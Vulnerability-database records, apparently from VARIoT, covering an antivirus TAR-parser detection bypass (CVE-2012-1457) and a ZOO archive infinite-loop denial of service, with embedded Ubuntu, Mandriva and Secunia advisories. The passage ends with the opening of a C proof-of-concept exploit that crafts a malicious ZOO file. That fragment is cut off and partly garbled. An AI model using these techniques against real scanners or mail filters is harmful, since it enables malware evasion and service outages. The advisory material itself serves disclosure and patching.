                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                  version: "2.0",
               },
               {
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "NONE",
                  baseScore: 4.3,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 8.6,
                  id: "VHN-54738",
                  impactScore: 2.9,
                  integrityImpact: "PARTIAL",
                  severity: "MEDIUM",
                  trust: 0.1,
                  vectorString: "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                  version: "2.0",
               },
            ],
            cvssV3: [],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2012-1457",
                  trust: 1.8,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201203-420",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "VULHUB",
                  id: "VHN-54738",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54738",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
         {
            db: "NVD",
            id: "CVE-2012-1457",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-420",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. Multiple products TAR A file parser contains a vulnerability that can prevent malware detection. Different TAR If it is announced that there is also a problem with the parser implementation, this vulnerability can be CVE May be split.By a third party TAR Total file size exceeded length With field TAR Malware detection can be bypassed via archive entries. \nSuccessful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. Vulnerabilities exist in the TAR file parser in version 1004, Trend Micro HouseCall version 9.120.0.1004, VBA32 version 3.12.14.2, and VirusBuster version 13.6.151.0. ============================================================================\nUbuntu Security Notice USN-1482-1\nJune 19, 2012\n\nclamav vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 LTS\n- Ubuntu 11.10\n- Ubuntu 11.04\n- Ubuntu 10.04 LTS\n\nSummary:\n\nClamAV could improperly detect malware if it opened a specially crafted\nfile. \n\nSoftware Description:\n- clamav: Anti-virus utility for Unix\n\nDetails:\n\nIt was discovered that ClamAV incorrectly handled certain malformed TAR\narchives. (CVE-2012-1457,\nCVE-2012-1459)\n\nIt was discovered that ClamAV incorrectly handled certain malformed CHM\nfiles. (CVE-2012-1458)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 LTS:\n  clamav                          0.97.5+dfsg-1ubuntu0.12.04.1\n  clamav-daemon                   0.97.5+dfsg-1ubuntu0.12.04.1\n  libclamav6                      0.97.5+dfsg-1ubuntu0.12.04.1\n\nUbuntu 11.10:\n  clamav                          0.97.5+dfsg-1ubuntu0.11.10.1\n  clamav-daemon                   0.97.5+dfsg-1ubuntu0.11.10.1\n  libclamav6                      0.97.5+dfsg-1ubuntu0.11.10.1\n\nUbuntu 11.04:\n  clamav                          0.97.5+dfsg-1ubuntu0.11.04.1\n  clamav-daemon                   0.97.5+dfsg-1ubuntu0.11.04.1\n  libclamav6                      0.97.5+dfsg-1ubuntu0.11.04.1\n\nUbuntu 10.04 LTS:\n  clamav                          0.96.5+dfsg-1ubuntu1.10.04.4\n  clamav-daemon                   0.96.5+dfsg-1ubuntu1.10.04.4\n  libclamav6                      0.96.5+dfsg-1ubuntu1.10.04.4\n\nIn general, a standard system update will make all the necessary changes. \n\nReferences:\n  http://www.ubuntu.com/usn/usn-1482-1\n  CVE-2012-1457, CVE-2012-1458, CVE-2012-1459\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.1\n  https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.1\n  https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.1\n  https://launchpad.net/ubuntu/+source/clamav/0.96.5+dfsg-1ubuntu1.10.04.4\n. \n \n The Microsoft CHM file parser in ClamAV 0.96.4 allows remote attackers\n to bypass malware detection via a crafted reset interval in the LZXC\n header of a CHM file. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1457\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1458\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1459\n http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=ChangeLog;hb=clamav-0.97.5\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Enterprise Server 5:\n d82d78601290e2f6073974170c81841a  mes5/i586/clamav-0.97.5-0.1mdvmes5.2.i586.rpm\n 80f0475472c0217afd3727019bf27e53  mes5/i586/clamav-db-0.97.5-0.1mdvmes5.2.i586.rpm\n c13835eadea8d2af15b628fba3159e8b  mes5/i586/clamav-milter-0.97.5-0.1mdvmes5.2.i586.rpm\n d7c058fae32f1a081b1d4ca31157df0e  mes5/i586/clamd-0.97.5-0.1mdvmes5.2.i586.rpm\n 5ad153709c7eb510c2be2e82bfa5ac52  mes5/i586/libclamav6-0.97.5-0.1mdvmes5.2.i586.rpm\n 96e3d3f3e9bea802c4109c155c9d1465  mes5/i586/libclamav-devel-0.97.5-0.1mdvmes5.2.i586.rpm \n 203cde43731b63729d1f7f6497033184  mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n b30f5aafd9aaff0a7743fb62f33ccbea  mes5/x86_64/clamav-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 1508801239427c0ac72734f52cb4451c  mes5/x86_64/clamav-db-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 92b4c5ca6db656801b5b6ae217c6e171  mes5/x86_64/clamav-milter-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 94fad12df2cc900309087bbda13c826a  mes5/x86_64/clamd-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 8ec166a457d0512479adaaf5f80d487f  mes5/x86_64/lib64clamav6-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 19bc2758175bcde28ebf7783d68a9b98  mes5/x86_64/lib64clamav-devel-0.97.5-0.1mdvmes5.2.x86_64.rpm \n 203cde43731b63729d1f7f6497033184  mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  <security*mandriva.com>\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niD8DBQFP3tnKmqjQ0CJFipgRAj4wAJ9eURS1mZYCZhkmUTVE/U8QAH47MwCgxQzf\nOUr1QL5Wsvt3KboLKCdYUhE=\n=1QL7\n-----END PGP SIGNATURE-----\n",
      sources: [
         {
            db: "NVD",
            id: "CVE-2012-1457",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
         {
            db: "BID",
            id: "52610",
         },
         {
            db: "VULHUB",
            id: "VHN-54738",
         },
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
      ],
      trust: 2.16,
   },
   exploit_availability: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            reference: "https://www.scap.org.cn/vuln/vhn-54738",
            trust: 0.1,
            type: "unknown",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54738",
         },
      ],
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2012-1457",
            trust: 3,
         },
         {
            db: "BID",
            id: "52610",
            trust: 1.4,
         },
         {
            db: "OSVDB",
            id: "80392",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80406",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80391",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80407",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80396",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80395",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80403",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80409",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80389",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80393",
            trust: 1.1,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-420",
            trust: 0.7,
         },
         {
            db: "BUGTRAQ",
            id: "20120319 EVASION ATTACKS EXPOLITING FILE-PARSING VULNERABILITIES IN ANTIVIRUS PRODUCTS",
            trust: 0.6,
         },
         {
            db: "NSFOCUS",
            id: "19229",
            trust: 0.6,
         },
         {
            db: "PACKETSTORM",
            id: "113841",
            trust: 0.2,
         },
         {
            db: "VULHUB",
            id: "VHN-54738",
            trust: 0.1,
         },
         {
            db: "PACKETSTORM",
            id: "113878",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54738",
         },
         {
            db: "BID",
            id: "52610",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            db: "NVD",
            id: "CVE-2012-1457",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-420",
         },
      ],
   },
   id: "VAR-201203-0381",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54738",
         },
      ],
      trust: 0.01,
   },
   last_update_date: "2023-12-18T12:10:12.001000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.aladdin.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.antiy.net/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.authentium.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "https://www.avast.com/index",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.avg.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.avira.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.rising-global.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.bitdefender.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.clamav.net/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.emsisoft.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.eset.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.f-prot.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.gdata-software.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.ikarus.at/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://global.jiangmin.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.k7computing.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.mcafee.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.microsoft.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.norman.com/",
         },
         {
            title: "openSUSE-SU-2012:0833",
            trust: 0.8,
            url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.pctools.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.quickheal.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.symantec.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.trendmicro.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://anti-virus.by/en/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.virusbuster.hu/en/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.kaspersky.com/",
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-264",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54738",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
         {
            db: "NVD",
            id: "CVE-2012-1457",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.7,
            url: "http://www.securityfocus.com/archive/1/522005",
         },
         {
            trust: 1.7,
            url: "http://www.ieee-security.org/tc/sp2012/program.html",
         },
         {
            trust: 1.1,
            url: "http://www.securityfocus.com/bid/52610",
         },
         {
            trust: 1.1,
            url: "http://www.mandriva.com/security/advisories?name=mdvsa-2012:094",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80389",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80391",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80392",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80393",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80395",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80396",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80403",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80406",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80407",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80409",
         },
         {
            trust: 1.1,
            url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
         },
         {
            trust: 1.1,
            url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74293",
         },
         {
            trust: 0.9,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1457",
         },
         {
            trust: 0.8,
            url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1457",
         },
         {
            trust: 0.6,
            url: "http://www.nsfocus.net/vulndb/19229",
         },
         {
            trust: 0.3,
            url: "http://www.antiy.net",
         },
         {
            trust: 0.3,
            url: "http://www.authentium.com",
         },
         {
            trust: 0.3,
            url: "http://www.avast.com",
         },
         {
            trust: 0.3,
            url: "http://www.avg.com",
         },
         {
            trust: 0.3,
            url: "http://www.avira.com/",
         },
         {
            trust: 0.3,
            url: "http://www.bitdefender.com",
         },
         {
            trust: 0.3,
            url: "http://www.emsisoft.com/en/software/antimalware/",
         },
         {
            trust: 0.3,
            url: "http://www.safenet-inc.com/data-protection/content-security-esafe/",
         },
         {
            trust: 0.3,
            url: "http://eset.com",
         },
         {
            trust: 0.3,
            url: "http://www.f-prot.com/",
         },
         {
            trust: 0.3,
            url: "http://www.gdatasoftware.com",
         },
         {
            trust: 0.3,
            url: "http://www.ikarus.at",
         },
         {
            trust: 0.3,
            url: "http://global.jiangmin.com/",
         },
         {
            trust: 0.3,
            url: "http://www.k7computing.com/en/product/k7-antivirusplus.php",
         },
         {
            trust: 0.3,
            url: "http://www.kaspersky.com/",
         },
         {
            trust: 0.3,
            url: "http://www.mcafee.com/",
         },
         {
            trust: 0.3,
            url: "http://www.microsoft.com",
         },
         {
            trust: 0.3,
            url: "http://anti-virus-software-review.toptenreviews.com/norman-review.html",
         },
         {
            trust: 0.3,
            url: "http://www.pctools.com/spyware-doctor-antivirus/",
         },
         {
            trust: 0.3,
            url: "http://www.quickheal.com/",
         },
         {
            trust: 0.3,
            url: "http://www.rising-global.com/",
         },
         {
            trust: 0.3,
            url: "http://www.symantec.com",
         },
         {
            trust: 0.3,
            url: "http://www.trend.com",
         },
         {
            trust: 0.3,
            url: "http://anti-virus.by/en/index.shtml",
         },
         {
            trust: 0.3,
            url: "/archive/1/522005",
         },
         {
            trust: 0.2,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1457",
         },
         {
            trust: 0.2,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1459",
         },
         {
            trust: 0.2,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1458",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.96.5+dfsg-1ubuntu1.10.04.4",
         },
         {
            trust: 0.1,
            url: "http://www.ubuntu.com/usn/usn-1482-1",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.1",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.1",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.1",
         },
         {
            trust: 0.1,
            url: "http://www.mandriva.com/security/",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1459",
         },
         {
            trust: 0.1,
            url: "http://www.mandriva.com/security/advisories",
         },
         {
            trust: 0.1,
            url: "http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=changelog;hb=clamav-0.97.5",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1458",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54738",
         },
         {
            db: "BID",
            id: "52610",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            db: "NVD",
            id: "CVE-2012-1457",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-420",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "VULHUB",
            id: "VHN-54738",
         },
         {
            db: "BID",
            id: "52610",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            db: "NVD",
            id: "CVE-2012-1457",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-420",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2012-03-21T00:00:00",
            db: "VULHUB",
            id: "VHN-54738",
         },
         {
            date: "2012-03-20T00:00:00",
            db: "BID",
            id: "52610",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
         {
            date: "2012-06-20T02:54:11",
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            date: "2012-06-19T00:56:02",
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            date: "2012-03-21T10:11:49.287000",
            db: "NVD",
            id: "CVE-2012-1457",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201203-420",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2018-01-18T00:00:00",
            db: "VULHUB",
            id: "VHN-54738",
         },
         {
            date: "2015-05-07T17:17:00",
            db: "BID",
            id: "52610",
         },
         {
            date: "2012-07-25T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
         {
            date: "2018-01-18T02:29:13.083000",
            db: "NVD",
            id: "CVE-2012-1457",
         },
         {
            date: "2012-04-01T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201203-420",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-420",
         },
      ],
      trust: 0.8,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple products  TAR Vulnerability that prevents file parsers from detecting malware",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "permissions and access control",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201203-420",
         },
      ],
      trust: 0.6,
   },
}

var-200705-0183
Vulnerability from variot

zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. (1) Barracuda Spam Firewall Or (2) Spam Firewall ,and (3) AMaViS Used in etc. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. A successful attack can exhaust system resources and trigger a denial-of-service condition. This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm.

Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure.

Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/

The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications.

The vulnerability is caused due to an error in the handling of Zoo archives. This can be exploited to cause an infinite loop resulting in high CPU utilisation.

SOLUTION: Update to firmware version 3.4 and virus definition 2.0.6399 or later.

PROVIDED AND/OR DISCOVERED BY: Jean-Sebastien Guay-Leroux

ORIGINAL ADVISORY: Barracuda Networks: http://www.barracudanetworks.com/ns/resources/tech_alert.php

Jean-Sebastien Guay-Leroux: http://www.guay-leroux.com/projects/zoo-infinite-advisory.txt

About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.

Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

. Topic: Multiple vendors ZOO file decompression infinite loop DoS

Announced: 2007-05-04 Credits: Jean-Sebastien Guay-Leroux Products: Multiple (see section III) Impact: DoS (99% CPU utilisation) CVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671, CVE-2007-1672, CVE-2007-1673

I. BACKGROUND

Zoo is a compression program and format developed by Rahul Dhesi in the mid 1980s. The format is based on the LZW compression algorithm and compressed files are identified by the .zoo file extension.

II. The vulnerability lies in the algorithm used to locate the files inside the archive. Each file in a ZOO archive is identified by a direntry structure. Those structures are linked between themselves with a 'next' pointer. This pointer is in fact an offset from the beginning of the file, representing the next direntry structure. By specifying an already processed file, it's possible to process more than one time this same file. The ZOO parser will then enter an infinite loop condition.

III. AFFECTED SOFTWARES

o Barracuda Spam Firewall o Panda Software Antivirus o avast! antivirus o Avira AntiVir o zoo-2.10 o unzoo.c o WinAce o PicoZip

IV. IMPACT

If this attack is conducted against a vulnerable antivirus, the host system will have its CPU at 100% utilization and may have problems answering other requests.

If this attack is conducted against an SMTP content filter running a vulnerable ZOO implementation, legitimate clients may be unable to send and receive email through this server.

V. SOLUTION

o Barracuda Spam Firewall - CVE-2007-1669: They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and 2.0.6399o for firmware < 3.4 March 19th 2007.

o Panda Software Antivirus - CVE-2007-1670: They fixed this problem April 2nd 2007.

o avast! antivirus - CVE-2007-1672: They fixed this problem in version 4.7.981, April 14th 2007.

o Avira AntiVir - CVE-2007-1671: They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007.

o zoo-2.10 - CVE-2007-1669: This software is not maintained anymore. A patch for version 2.10 is provided in section VII of this advisory because some SMTP content filters may still use this software.

o unzoo.c - CVE-2007-1673: This software is not maintained anymore. No patch is provided for this software.

o WinAce was contacted but no response was received from them.

o PicoZip was contacted but no response was received from them.

VI. PROOF OF CONCEPT

Using the PIRANA framework version 0.3.3, available at http://www.guay-leroux.com , it is possible to test your SMTP server against this vulnerability.

Alternatively, here is an exploit that will create a file that will trigger the infinite loop condition when it is processed.

/*

Exploit for the vulnerability: Multiple vendors ZOO file decompression infinite loop DoS

coded by Jean-S\xe9bastien Guay-Leroux September 2006

*/

include

include

include

// Structure of a ZOO header

define ZOO_HEADER_SIZE 0x0000002a

define ZH_TEXT 0

define ZH_TAG 20

define ZH_START_OFFSET 24

define ZH_NEG_START_OFFSET 28

define ZH_MAJ_VER 32

define ZH_MIN_VER 33

define ZH_ARC_HTYPE 34

define ZH_ARC_COMMENT 35

define ZH_ARC_COMMENT_LENGTH 39

define ZH_VERSION_DATA 41

define D_DIRENTRY_LENGTH 56

define D_TAG 0

define D_TYPE 4

define D_PACKING_METHOD 5

define D_NEXT_ENTRY 6

define D_OFFSET 10

define D_DATE 14

define D_TIME 16

define D_FILE_CRC 18

define D_ORIGINAL_SIZE 20

define D_SIZE_NOW 24

define D_MAJ_VER 28

define D_MIN_VER 29

define D_DELETED 30

define D_FILE_STRUCT 31

define D_COMMENT_OFFSET 32

define D_COMMENT_SIZE 36

define D_FILENAME 38

define D_VAR_DIR_LEN 51

define D_TIMEZONE 53

define D_DIR_CRC 54

define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 )

define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 )

define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 )

void put_byte (char ptr, unsigned char data) { ptr = data; }

void put_word (char *ptr, unsigned short data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); }

